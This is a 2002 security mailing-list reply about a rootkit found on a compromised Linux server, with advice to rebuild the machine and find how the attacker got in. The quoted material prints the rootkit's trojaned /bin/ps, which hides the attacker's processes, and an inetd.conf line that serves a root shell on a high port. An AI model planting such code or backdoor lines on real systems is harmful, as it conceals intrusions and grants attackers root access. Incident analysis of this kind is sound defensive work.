Security Incidents mailing list archives
Re: nouser - rootkit ?
From: Eric Brandwine <ericb () UU NET>
Date: 11 Mar 2002 17:57:38 +0000
"du" == Dan Uscatu <duscatu () phenomedia ro> writes:
du> [root@www /root]# cat /bin/ps du> #!/usr/bin/perl du> $xargs =join(' ',@ARGV); du> $ps = `/usr/lib/libxnotps $xargs \| grep -v nouser \| grep -v noshell \| du> grep -v proftp \| grep -v \"/bin/ps\" \| grep -v libxnotps`; du> print "$ps"; WOW! That is really lame! It may qualify as the first cross-platform root kit I've ever seen though ;) This moron clearly does not know how to use perl regexps (among many other things). At least use fgrep! du> i have scanned the machine using chkroot kit... the only funny thing found du> was an inetd.conf, containing: du> [root@www nouser]# cat /etc/inetd.conf du> 65456 stream tcp nowait root /bin/sh sh du> of course, inetd is not installed :) that points me to the idea that the du> process was somehow automated... but i cant find any reference to a rootkit du> that does these changes. seems pretty stupid for a rootkit anyway... but i du> want to be sure no other major changes were made... before i install the du> production server there. This looks like a clueless kiddie cobbled together a bunch of stuff he found on the net, and packaged it up. Either it's a red herring, and the real root kit is much better hidden, or it'll be almost trivial to clean up. But you've no way of knowing. I'd rebuild the box from scratch, if it were mine. Of much more importance is how he got in. Scrape this loser off your box, and another one will take his place. And the new one might not be quite so incompetent. ericb -- Eric Brandwine | Contrary to the popular belief that it's hard to recover UUNetwork Security | information, it's actually starting to appear that it's ericb () uu net | very hard to remove something even if you want to. +1 703 886 6038 | - Dan Farmer Key fingerprint = 3A39 2C2F D5A0 FC7C 5F60 4118 A84A BD5D 59D7 4E3E ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- nouser - rootkit ? Dan Uscatu (Mar 10)
- Re: nouser - rootkit ? Eric Brandwine (Mar 11)
- Re: nouser - rootkit ? Ryan Russell (Mar 11)
- Re: nouser - rootkit ? Konrad Rieck (Mar 11)
- Re: nouser - rootkit ? Bruce Ediger (Mar 12)
- Re: nouser - rootkit ? Kyle R Maxwell (Mar 12)
- Re: nouser - rootkit ? Jose Nazario (Mar 12)
- Re: nouser - rootkit ? Eric Brandwine (Mar 12)
- Re: nouser - rootkit ? [:multiple root kit thread:] Dan Rohan (Mar 12)
- Re: nouser - rootkit ? Dave Dittrich (Mar 12)
- Re: nouser - rootkit ? Eric Brandwine (Mar 12)
- Re: nouser - rootkit ? Brian Hatch (Mar 12)
- Re: nouser - rootkit ? Eric Brandwine (Mar 11)